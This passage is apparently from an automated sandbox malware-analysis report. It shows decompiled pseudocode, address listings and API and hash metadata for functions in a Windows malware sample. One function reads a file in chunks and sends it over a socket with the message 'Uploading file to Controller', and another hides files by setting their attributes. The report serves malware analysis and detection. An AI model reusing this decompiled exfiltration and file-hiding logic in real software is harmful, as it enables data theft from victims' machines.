                    0x004459c6
                    0x004459c9
                    0x004459cb
                    0x004459d4
                    0x004459d6
                    0x004459d8
                    0x004459d9
                    0x004459e4
                    0x004459e9
                    0x004459ed
                    0x004459fb
                    0x00445a0e
                    0x00445a1c
                    0x00445a27
                    0x00445a2c
                    0x004459ed
                    0x00445a2f
                    0x00445a32
                    0x00445a38
                    0x00445a41
                    0x00445a46
                    0x00445a4f
                    0x00445a58
                    0x00445a61
                    0x00445a8c
                    0x00445a8f
                    0x00000000
                    0x0044596c
                    0x0044596c
                    0x0044596f
                    0x0044596f
                    0x00445973
                    0x00000000
                    0x00000000
                    0x00445975
                    0x0044597e
                    0x0044599c
                    0x0044599c
                    0x004459a2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004459a2
                    0x00445986
                    0x00445989
                    0x0044598e
                    0x0044598f
                    0x00445992
                    0x00445998
                    0x00000000
                    0x00445989
                    0x00000000
                    0x004459a4
                    0x004458e2
                    0x004458e2
                    0x004458e5
                    0x004458e5
                    0x004458e9
                    0x00000000
                    0x00000000
                    0x004458eb
                    0x004458ef
                    0x004458fc
                    0x004458f4
                    0x004458f8
                    0x004458f8
                    0x004458f9
                    0x004458f9
                    0x00445900
                    0x00445903
                    0x00445906
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00445906
                    0x00000000
                    0x004458e5
                    0x004458db
                    0x00445812
                    0x0044579b
                    0x004457a0
                    0x004457a5
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: 49eecb2d44334952ee5afa2078b76221233296b27580019d537252d2bff923be
                    • Instruction ID: 0279200542a0296f68b72e6cdb0e21316d089ef91fc754afb570b0c47b4b8add
                    • Opcode Fuzzy Hash: 49eecb2d44334952ee5afa2078b76221233296b27580019d537252d2bff923be
                    • Instruction Fuzzy Hash: 00B1BE71900605AFEF21DF69C881BEEBBB5BF09304F18412EF495A7342DB79A941CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00450CD6(intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t25;
                    				intOrPtr* _t26;
                    				intOrPtr _t28;
                    				intOrPtr* _t29;
                    				intOrPtr* _t31;
                    				intOrPtr* _t45;
                    				intOrPtr* _t46;
                    				intOrPtr* _t47;
                    				intOrPtr* _t55;
                    				intOrPtr* _t70;
                    				intOrPtr _t74;
                    
                    				_t74 = _a4;
                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                    				if(_t25 != 0 && _t25 != 0x470188) {
                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                    					if(_t45 != 0 &&  *_t45 == 0) {
                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                    						if(_t46 != 0 &&  *_t46 == 0) {
                    							E00446172(_t46);
                    							E0044FF12( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                    						if(_t47 != 0 &&  *_t47 == 0) {
                    							E00446172(_t47);
                    							E004503CC( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						E00446172( *((intOrPtr*)(_t74 + 0x7c)));
                    						E00446172( *((intOrPtr*)(_t74 + 0x88)));
                    					}
                    				}
                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                    				if(_t26 != 0 &&  *_t26 == 0) {
                    					E00446172( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                    					E00446172( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                    					E00446172( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                    					E00446172( *((intOrPtr*)(_t74 + 0x8c)));
                    				}
                    				E00450E49( *((intOrPtr*)(_t74 + 0x9c)));
                    				_t28 = 6;
                    				_t16 = _t74 + 0xa0; // 0xa0
                    				_t55 = _t16;
                    				_v8 = _t28;
                    				_t18 = _t74 + 0x28; // 0x28
                    				_t70 = _t18;
                    				do {
                    					if( *((intOrPtr*)(_t70 - 8)) != 0x4702a8) {
                    						_t31 =  *_t70;
                    						if(_t31 != 0 &&  *_t31 == 0) {
                    							E00446172(_t31);
                    							E00446172( *_t55);
                    						}
                    						_t28 = _v8;
                    					}
                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                    						if(_t29 != 0 &&  *_t29 == 0) {
                    							E00446172(_t29);
                    						}
                    						_t28 = _v8;
                    					}
                    					_t55 = _t55 + 4;
                    					_t70 = _t70 + 0x10;
                    					_t28 = _t28 - 1;
                    					_v8 = _t28;
                    				} while (_t28 != 0);
                    				return E00446172(_t74);
                    			}















                    0x00450cde
                    0x00450ce2
                    0x00450cea
                    0x00450cf3
                    0x00450cf8
                    0x00450cff
                    0x00450d07
                    0x00450d0f
                    0x00450d1a
                    0x00450d20
                    0x00450d21
                    0x00450d29
                    0x00450d31
                    0x00450d3c
                    0x00450d42
                    0x00450d46
                    0x00450d51
                    0x00450d57
                    0x00450cf8
                    0x00450d58
                    0x00450d60
                    0x00450d73
                    0x00450d86
                    0x00450d94
                    0x00450d9f
                    0x00450da4
                    0x00450dad
                    0x00450db5
                    0x00450db6
                    0x00450db6
                    0x00450dbc
                    0x00450dbf
                    0x00450dbf
                    0x00450dc2
                    0x00450dc9
                    0x00450dcb
                    0x00450dcf
                    0x00450dd7
                    0x00450dde
                    0x00450de4
                    0x00450de5
                    0x00450de5
                    0x00450dec
                    0x00450dee
                    0x00450df3
                    0x00450dfb
                    0x00450e00
                    0x00450e01
                    0x00450e01
                    0x00450e04
                    0x00450e07
                    0x00450e0a
                    0x00450e0d
                    0x00450e0d
                    0x00450e1f

                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 00450D1A
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FF2F
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FF41
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FF53
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FF65
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FF77
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FF89
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FF9B
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FFAD
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FFBF
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FFD1
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FFE3
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 0044FFF5
                      • Part of subcall function 0044FF12: _free.LIBCMT ref: 00450007
                    • _free.LIBCMT ref: 00450D0F
                      • Part of subcall function 00446172: RtlFreeHeap.NTDLL(00000000,00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000), ref: 00446188
                      • Part of subcall function 00446172: GetLastError.KERNEL32(00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000,00000000), ref: 0044619A
                    • _free.LIBCMT ref: 00450D31
                    • _free.LIBCMT ref: 00450D46
                    • _free.LIBCMT ref: 00450D51
                    • _free.LIBCMT ref: 00450D73
                    • _free.LIBCMT ref: 00450D86
                    • _free.LIBCMT ref: 00450D94
                    • _free.LIBCMT ref: 00450D9F
                    • _free.LIBCMT ref: 00450DD7
                    • _free.LIBCMT ref: 00450DDE
                    • _free.LIBCMT ref: 00450DFB
                    • _free.LIBCMT ref: 00450E13
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 15bc8deb81c01d2cce52081c1e5098198f40428153fe6556b2c8ebd7c5066e6d
                    • Instruction ID: 2e961a4cfbfe7aebe754ef676a2a70577de98227452a39186c48f2d24eaa121b
                    • Opcode Fuzzy Hash: 15bc8deb81c01d2cce52081c1e5098198f40428153fe6556b2c8ebd7c5066e6d
                    • Instruction Fuzzy Hash: 5A319E356002009FEB21AAB9D845B5B73F9EF02356F14841FE848D7263DB38FD488719
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E00408AA1(void* __ecx, char _a4, char _a8, char _a28, void* _a32, char _a52) {
                    				char _v12;
                    				void* _v16;
                    				char _v28;
                    				void* _v40;
                    				char _v52;
                    				void* _v56;
                    				char _v64;
                    				char _v76;
                    				void* _v80;
                    				char _v100;
                    				void* _v104;
                    				char _v116;
                    				char _v124;
                    				char _v128;
                    				signed int _v140;
                    				char _v144;
                    				char _v148;
                    				struct %anon52 _v156;
                    				char _v164;
                    				void* _v168;
                    				struct %anon52 _v176;
                    				union _LARGE_INTEGER* _v180;
                    				void* _v184;
                    				intOrPtr _v188;
                    				long _v192;
                    				signed int _v196;
                    				intOrPtr _v200;
                    				union _LARGE_INTEGER* _v204;
                    				union _LARGE_INTEGER _v208;
                    				intOrPtr _v216;
                    				intOrPtr _v220;
                    				long _v224;
                    				signed int _v228;
                    				intOrPtr _v236;
                    				signed int _v244;
                    				intOrPtr _v248;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t94;
                    				void* _t101;
                    				void* _t111;
                    				void* _t113;
                    				void* _t121;
                    				signed int _t134;
                    				void* _t135;
                    				signed int _t136;
                    				void* _t146;
                    				void* _t150;
                    				void* _t161;
                    				void* _t164;
                    				signed int _t167;
                    				struct _OVERLAPPED* _t169;
                    				struct %anon52 _t192;
                    				signed int _t208;
                    				void* _t214;
                    				union _LARGE_INTEGER* _t247;
                    				void* _t255;
                    				void* _t256;
                    				union _LARGE_INTEGER _t261;
                    				void* _t262;
                    				void* _t264;
                    				void* _t265;
                    				void* _t267;
                    				void* _t268;
                    				void* _t269;
                    				void* _t270;
                    				void* _t271;
                    				void* _t276;
                    
                    				_t266 =  &_v184;
                    				_v140 = _v140 & 0x00000000;
                    				_t255 = __ecx;
                    				_v176.LowPart = 0x186a0;
                    				if(_a4 != 0) {
                    					_t161 = E004076ED(0x46b928);
                    					_t278 = _t161;
                    					if(_t161 != 0) {
                    						_t276 =  &_v184 - 0x18;
                    						E00408F83(_t167, _t276, 0x46b928, _t278,  &_a8);
                    						_t164 = E0041AEC7(_t167,  &_v52, 0x46b928, _t264);
                    						_t266 = _t276 + 0x18;
                    						E00401F13( &_a28, 0x46b928, _t256, _t164);
                    						E00401F09();
                    					}
                    				}
                    				E0040482D(_t255);
                    				E004048C8(_t255, _t256, _t255);
                    				_t94 = E0041B7B3(_t167,  &_v124,  &_a28);
                    				_t267 = _t266 - 0x18;
                    				_t246 = E00402F10(_t167,  &_v52, E00402F10(_t167,  &_v28, E00402F10(_t167,  &_v100, E0041B7B3(_t167,  &_v76,  &_a4), _t264, _t278, 0x473ec8), _t264, _t278,  &_a52), _t264, _t278, 0x473ec8);
                    				E00402EA1(_t267, _t99, _t94);
                    				_push(0xb6);
                    				_t101 = E00404AA1(_t255, _t99, _t278);
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				if((_t167 & 0xffffff00 | _t101 == 0xffffffff) == 0) {
                    					_t169 = 0;
                    					_t265 = CreateFileW(E00401F04( &_v12), 0x80000000, 1, 0, 3, 0x80, 0);
                    					__eflags = _t265 - 0xffffffff;
                    					if(__eflags != 0) {
                    						_v148 = 0;
                    						_v144 = 0;
                    						__imp__GetFileSizeEx( &_v148);
                    						_t247 = _v156.HighPart;
                    						_t192 = _v156;
                    						_v176 = _t192;
                    						_v180 = _t247;
                    						_v208.LowPart = _t192;
                    						_v200 = _t247;
                    						_v196 = 1;
                    						_v192 = 0;
                    						_t111 = E00456C10(_t192, _t247, 0x186a0, 0);
                    						asm("adc edx, ebx");
                    						_t113 = E0041B65D(0,  &_v140, _t247, _t111 + 1, _t247);
                    						_t268 = _t267 - 0x10;
                    						E00402EA1(_t268, E00402F10(0,  &_v164, E0041B65D(0,  &_v116, _t247, _v192, _v196), _t265, __eflags, 0x473ec8), _t113);
                    						E00404AA1(_t255, _t115, __eflags, 0xb7, _t265);
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						_t121 = E0041B753( &_v192,  &_v64);
                    						_t269 = _t268 - 0x18;
                    						_t251 = "Uploading file to Controller: ";
                    						E004052FD(0, _t269, "Uploading file to Controller: ", _t265, __eflags, _t121);
                    						_t270 = _t269 - 0x14;
                    						E00402093(0, _t270, "Uploading file to Controller: ", _t265, "i");
                    						E0041AF84(0, _t255);
                    						_t271 = _t270 + 0x30;
                    						_t208 =  &_v196;
                    						E00401FD8();
                    						asm("xorps xmm0, xmm0");
                    						asm("movlpd [esp+0x40], xmm0");
                    						__eflags = _v228;
                    						if(__eflags < 0) {
                    							L22:
                    							CloseHandle(_t265);
                    							E00404E26(_t251);
                    							_t169 = 1;
                    							goto L23;
                    						}
                    						if(__eflags > 0) {
                    							L11:
                    							_t261 = 0;
                    							__eflags = 0;
                    							_v204 = _v180;
                    							_v208.LowPart = _v184;
                    							_t134 = 0x186a0;
                    							goto L12;
                    							do {
                    								do {
                    									L12:
                    									_t246 = _v220;
                    									__eflags = _t261 - _t246;
                    									if(__eflags < 0) {
                    										L16:
                    										_push(_t134);
                    										_t135 = E004341B6(_t208, _t246, _t261, __eflags);
                    										_push(_t169);
                    										_t262 = _t135;
                    										_v192 = _t169;
                    										_v184 = _t262;
                    										_t136 = SetFilePointerEx(_t265, _v208.LowPart, _v204, _t169);
                    										__eflags = _t136;
                    										if(_t136 == 0) {
                    											_t272 = _t271 - 0x18;
                    											_t214 = _t271 - 0x18;
                    											_push("SetFilePointerEx error");
                    											L27:
                    											E00402093(_t169, _t214, _t246, _t265);
                    											E00402093(_t169, _t272 - 0x18, _t246, _t265, "E");
                    											E0041AF84(_t169, _t255);
                    											E004341BF(_t262);
                    											CloseHandle(_t265);
                    											L28:
                    											E00404E26(_t246);
                    											goto L23;
                    										}
                    										__eflags = ReadFile(_t265, _t262, _v224,  &_v192, _t169);
                    										if(__eflags == 0) {
                    											_t272 = _t271 - 0x18;
                    											_t214 = _t271 - 0x18;
                    											_push("ReadFile error");
                    											goto L27;
                    										}
                    										_t146 = E004020B7(_t169,  &_v144, _t246, _t265, __eflags, _t262, _v192);
                    										_t271 = _t271 - 0x18;
                    										_t253 = E00402F10(_t169,  &_v176, E0041B65D(_t169,  &_v128, _t246, _v224, _v220), _t265, __eflags, 0x473ec8);
                    										E00402EA1(_t271, _t148, _t146);
                    										_push(0x52);
                    										_t150 = E00404AA1(_t255, _t148, __eflags);
                    										__eflags = _t150 - 0xffffffff;
                    										E00401FD8();
                    										E00401FD8();
                    										E00401FD8();
                    										__eflags = _t169 & 0xffffff00 | _t150 == 0xffffffff;
                    										if((_t169 & 0xffffff00 | _t150 == 0xffffffff) != 0) {
                    											E00404E26(_t253);
                    											CloseHandle(_t265);
                    											E004341BF(_v204);
                    											goto L5;
                    										}
                    										goto L19;
                    									}
                    									_t208 = _v228;
                    									if(__eflags > 0) {
                    										L15:
                    										_t134 = _t208;
                    										_v188 = _t246;
                    										_v224 = _t134;
                    										goto L16;
                    									}
                    									__eflags = _t134 - _t208;
                    									if(__eflags <= 0) {
                    										goto L16;
                    									}
                    									goto L15;
                    									L19:
                    									E004341BF(_v204);
                    									_t134 = _v244;
                    									_v248 = _v248 - _t134;
                    									_t261 = _v208;
                    									asm("sbb [esp+0x20], esi");
                    									_v236 = _v236 + 1;
                    									_t251 = _v224;
                    									_t169 = 0;
                    									asm("adc [esp+0x24], ebx");
                    									_t208 = _v228 + _t134;
                    									_v228 = _t208;
                    									asm("adc edx, esi");
                    									_v224 = _t251;
                    									__eflags = _t251 - _v220;
                    								} while (__eflags < 0);
                    								if(__eflags > 0) {
                    									goto L22;
                    								}
                    								__eflags = _t208 - _v216;
                    							} while (_t208 < _v216);
                    							goto L22;
                    						}
                    						__eflags = _v196;
                    						if(_v196 <= 0) {
                    							goto L22;
                    						}
                    						goto L11;
                    					}
                    					E00402093(0, _t267 - 0x18, _t246, _t265, 0x465094);
                    					_push(0x53);
                    					E00404AA1(_t255, _t246, __eflags);
                    					goto L28;
                    				} else {
                    					E00404E26(_t246);
                    					L5:
                    					_t169 = 0;
                    					L23:
                    					E00401F09();
                    					E00401F09();
                    					E00401FD8();
                    					return _t169;
                    				}
                    			}









































































                    0x00408aa1
                    0x00408aa7
                    0x00408ab8
                    0x00408aba
                    0x00408ac2
                    0x00408ad0
                    0x00408ad5
                    0x00408ad7
                    0x00408ad9
                    0x00408ae6
                    0x00408af2
                    0x00408af7
                    0x00408b02
                    0x00408b0e
                    0x00408b0e
                    0x00408ad7
                    0x00408b15
                    0x00408b1d
                    0x00408b2d
                    0x00408b32
                    0x00408b87
                    0x00408b8b
                    0x00408b91
                    0x00408b98
                    0x00408baa
                    0x00408bb6
                    0x00408bbf
                    0x00408bcb
                    0x00408bd4
                    0x00408bdb
                    0x00408beb
                    0x00408c10
                    0x00408c12
                    0x00408c15
                    0x00408c38
                    0x00408c3e
                    0x00408c42
                    0x00408c48
                    0x00408c51
                    0x00408c5b
                    0x00408c60
                    0x00408c64
                    0x00408c68
                    0x00408c6c
                    0x00408c70
                    0x00408c74
                    0x00408c7f
                    0x00408c83
                    0x00408c88
                    0x00408cb9
                    0x00408cc6
                    0x00408ccf
                    0x00408cdb
                    0x00408ce4
                    0x00408cf4
                    0x00408cf9
                    0x00408cfc
                    0x00408d04
                    0x00408d09
                    0x00408d13
                    0x00408d18
                    0x00408d1d
                    0x00408d20
                    0x00408d24
                    0x00408d29
                    0x00408d2c
                    0x00408d32
                    0x00408d36
                    0x00408e8a
                    0x00408e8b
                    0x00408e93
                    0x00408e98
                    0x00000000
                    0x00408e98
                    0x00408d3c
                    0x00408d48
                    0x00408d4c
                    0x00408d4c
                    0x00408d4e
                    0x00408d56
                    0x00408d5a
                    0x00408d5a
                    0x00408d5f
                    0x00408d5f
                    0x00408d5f
                    0x00408d5f
                    0x00408d63
                    0x00408d65
                    0x00408d7b
                    0x00408d7b
                    0x00408d7c
                    0x00408d82
                    0x00408d88
                    0x00408d8a
                    0x00408d92
                    0x00408d97
                    0x00408d9d
                    0x00408d9f
                    0x00408ef6
                    0x00408ef9
                    0x00408efb
                    0x00408f00
                    0x00408f00
                    0x00408f0f
                    0x00408f14
                    0x00408f1a
                    0x00408f23
                    0x00408f29
                    0x00408f2b
                    0x00000000
                    0x00408f2b
                    0x00408db8
                    0x00408dba
                    0x00408eea
                    0x00408eed
                    0x00408eef
                    0x00000000
                    0x00408eef
                    0x00408dc9
                    0x00408dce
                    0x00408dfb
                    0x00408dff
                    0x00408e05
                    0x00408e09
                    0x00408e0e
                    0x00408e18
                    0x00408e24
                    0x00408e2d
                    0x00408e32
                    0x00408e34
                    0x00408ecf
                    0x00408ed5
                    0x00408edf
                    0x00000000
                    0x00408ee4
                    0x00000000
                    0x00408e34
                    0x00408d67
                    0x00408d6b
                    0x00408d71
                    0x00408d71
                    0x00408d73
                    0x00408d77
                    0x00000000
                    0x00408d77
                    0x00408d6d
                    0x00408d6f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00408e3a
                    0x00408e3e
                    0x00408e43
                    0x00408e47
                    0x00408e4b
                    0x00408e4f
                    0x00408e53
                    0x00408e58
                    0x00408e63
                    0x00408e64
                    0x00408e68
                    0x00408e6a
                    0x00408e6e
                    0x00408e70
                    0x00408e74
                    0x00408e74
                    0x00408e7e
                    0x00000000
                    0x00000000
                    0x00408e80
                    0x00408e80
                    0x00000000
                    0x00408d5f
                    0x00408d3e
                    0x00408d42
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00408d42
                    0x00408c21
                    0x00408c26
                    0x00408c2a
                    0x00000000
                    0x00408bdd
                    0x00408bdf
                    0x00408be4
                    0x00408be4
                    0x00408e9a
                    0x00408ea1
                    0x00408ead
                    0x00408eb9
                    0x00408eca
                    0x00408eca

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408C0A
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408C42
                    • __aulldiv.LIBCMT ref: 00408C74
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408D97
                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408DB2
                    • CloseHandle.KERNEL32(00000000), ref: 00408E8B
                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408ED5
                    • CloseHandle.KERNEL32(00000000), ref: 00408F23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                    • API String ID: 3086580692-2596673759
                    • Opcode ID: 81b4ce201ec1f64608434e2d6c44a9c018c49d124c853f14262fc190bc0f64d7
                    • Instruction ID: ab455ae2e198251dfbe974f7558c018b87a1f8ea32188bc9c66bfff2ca6f2b0d
                    • Opcode Fuzzy Hash: 81b4ce201ec1f64608434e2d6c44a9c018c49d124c853f14262fc190bc0f64d7
                    • Instruction Fuzzy Hash: D4B191716083409BC314FB26C982AAFB7E5AFD4354F40492FF589622D1EF789945CB8B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E0040A59B(void* __ecx, char* __edx) {
                    				char _v1028;
                    				char _v1040;
                    				char _v1064;
                    				char _v1076;
                    				void* _v1088;
                    				void* _v1092;
                    				char _v1100;
                    				char _v1124;
                    				void* _v1132;
                    				char _v1136;
                    				void* _v1148;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				signed char _t32;
                    				char* _t34;
                    				void* _t36;
                    				int _t40;
                    				void* _t47;
                    				int _t62;
                    				void* _t64;
                    				void* _t70;
                    				void* _t71;
                    				void* _t79;
                    				void* _t134;
                    				signed int _t136;
                    				signed int _t139;
                    
                    				_t126 = __edx;
                    				_t139 = _t136 & 0xfffffff8;
                    				_t79 = __ecx;
                    				_push(_t130);
                    				_t134 = __ecx + 4;
                    				do {
                    					Sleep(0x1388);
                    					E0040A4EA(_t79, _t126);
                    					_t126 = 0x46b928;
                    					if(E004076DE(_t139) != 0) {
                    						if(E00406A4F() == 0) {
                    							CreateDirectoryW(E00401F04(0x474158), 0);
                    						}
                    						_t128 = _t79 + 0x68;
                    						_t32 = GetFileAttributesW(E00401F04(_t79 + 0x68));
                    						_t142 = _t32 & 0x00000002;
                    						if((_t32 & 0x00000002) != 0) {
                    							SetFileAttributesW(E00401F04(_t128), 0x80);
                    						}
                    						_t34 = E00401FAB(E00401E65(0x4740cc, _t126, _t134, _t142, 0x12));
                    						_t143 =  *_t34;
                    						if( *_t34 != 0) {
                    							E004020DF(_t79,  &_v1124);
                    							_t36 = E0040247C();
                    							E00406BDE( &_v1028, E00401FAB(0x474320), _t36);
                    							_t40 = PathFileExistsW(E00401F04(_t128));
                    							__eflags = _t40;
                    							if(_t40 != 0) {
                    								E004020DF(_t79,  &_v1100);
                    								E00401F04(_t128);
                    								_t126 =  &_v1100;
                    								_t62 = E0041BF1A( &_v1100);
                    								__eflags = _t62;
                    								if(_t62 != 0) {
                    									_t64 = E0040247C();
                    									E00401FE2( &_v1136,  &_v1100, _t130, E00406CFF(_t79,  &_v1028,  &_v1100,  &_v1076, E00401FAB( &_v1100), _t64));
                    									E00401FD8();
                    								}
                    								E00401FD8();
                    							}
                    							__eflags = E0040247C() + _t41;
                    							L00403376(E004020B7(_t79,  &_v1076, _t126, _t134, __eflags, E00401F04(_t134), E0040247C() + _t41));
                    							E00401FD8();
                    							_t47 = E0040247C();
                    							E00406CFF(_t79,  &_v1040, _t126,  &_v1064, E00401FAB( &_v1136), _t47);
                    							_t126 = E00401F04(_t128);
                    							E0041BF87( &_v1076, _t51);
                    							E00401FD8();
                    							E00401FD8();
                    						} else {
                    							_t70 = E00401F04(_t128);
                    							_t71 = E0040247C();
                    							_t132 = _t71;
                    							_t130 = _t71 + _t132;
                    							E00401F04(_t134);
                    							_t126 = _t71 + _t132;
                    							E0041BE86(_t71 + _t132, _t70, 1);
                    						}
                    						L00408F7E(_t79, _t134, _t126, 0x46b928);
                    						if( *((char*)(E00401FAB(E00401E65(0x4740cc, _t126, _t134, _t143, 0x13)))) != 0) {
                    							SetFileAttributesW(E00401F04(_t128), 6);
                    						}
                    					}
                    				} while ( *((char*)(_t79 + 0x49)) != 0);
                    				return 0;
                    			}






























                    0x0040a59b
                    0x0040a59e
                    0x0040a5a9
                    0x0040a5ab
                    0x0040a5ad
                    0x0040a5b0
                    0x0040a5b5
                    0x0040a5bd
                    0x0040a5c2
                    0x0040a5d0
                    0x0040a5e2
                    0x0040a5f1
                    0x0040a5f1
                    0x0040a5f7
                    0x0040a602
                    0x0040a608
                    0x0040a60a
                    0x0040a619
                    0x0040a619
                    0x0040a62d
                    0x0040a632
                    0x0040a635
                    0x0040a667
                    0x0040a671
                    0x0040a686
                    0x0040a693
                    0x0040a699
                    0x0040a69b
                    0x0040a6a1
                    0x0040a6a8
                    0x0040a6ad
                    0x0040a6b3
                    0x0040a6b8
                    0x0040a6ba
                    0x0040a6c0
                    0x0040a6e3
                    0x0040a6ec
                    0x0040a6ec
                    0x0040a6f5
                    0x0040a6f5
                    0x0040a701
                    0x0040a71a
                    0x0040a723
                    0x0040a72c
                    0x0040a745
                    0x0040a751
                    0x0040a757
                    0x0040a760
                    0x0040a769
                    0x0040a637
                    0x0040a63b
                    0x0040a643
                    0x0040a648
                    0x0040a64c
                    0x0040a64e
                    0x0040a653
                    0x0040a657
                    0x0040a65d
                    0x0040a775
                    0x0040a790
                    0x0040a79c
                    0x0040a79c
                    0x0040a790
                    0x0040a7a2
                    0x0040a7b5

                    APIs
                    • Sleep.KERNEL32(00001388), ref: 0040A5B5
                      • Part of subcall function 0040A4EA: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A5C2), ref: 0040A520
                      • Part of subcall function 0040A4EA: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A5C2), ref: 0040A52F
                      • Part of subcall function 0040A4EA: Sleep.KERNEL32(00002710,?,?,?,0040A5C2), ref: 0040A55C
                      • Part of subcall function 0040A4EA: CloseHandle.KERNEL32(00000000,?,?,?,0040A5C2), ref: 0040A563
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A5F1
                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A602
                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A619
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A693
                      • Part of subcall function 0041BF1A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A6B8), ref: 0041BF33
                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0046B928,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A79C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                    • String ID: CG$ CG$X2}$XAG$XAG
                    • API String ID: 3795512280-3706361568
                    • Opcode ID: 035d4a0fffba786095b172388941e496167f5358dc469a92f50b1badc7cf6ce7
                    • Instruction ID: 9fedc016ce9c009fb4cb5d07e8742cd340070ae1072767f308c2e2ed860f20de
                    • Opcode Fuzzy Hash: 035d4a0fffba786095b172388941e496167f5358dc469a92f50b1badc7cf6ce7
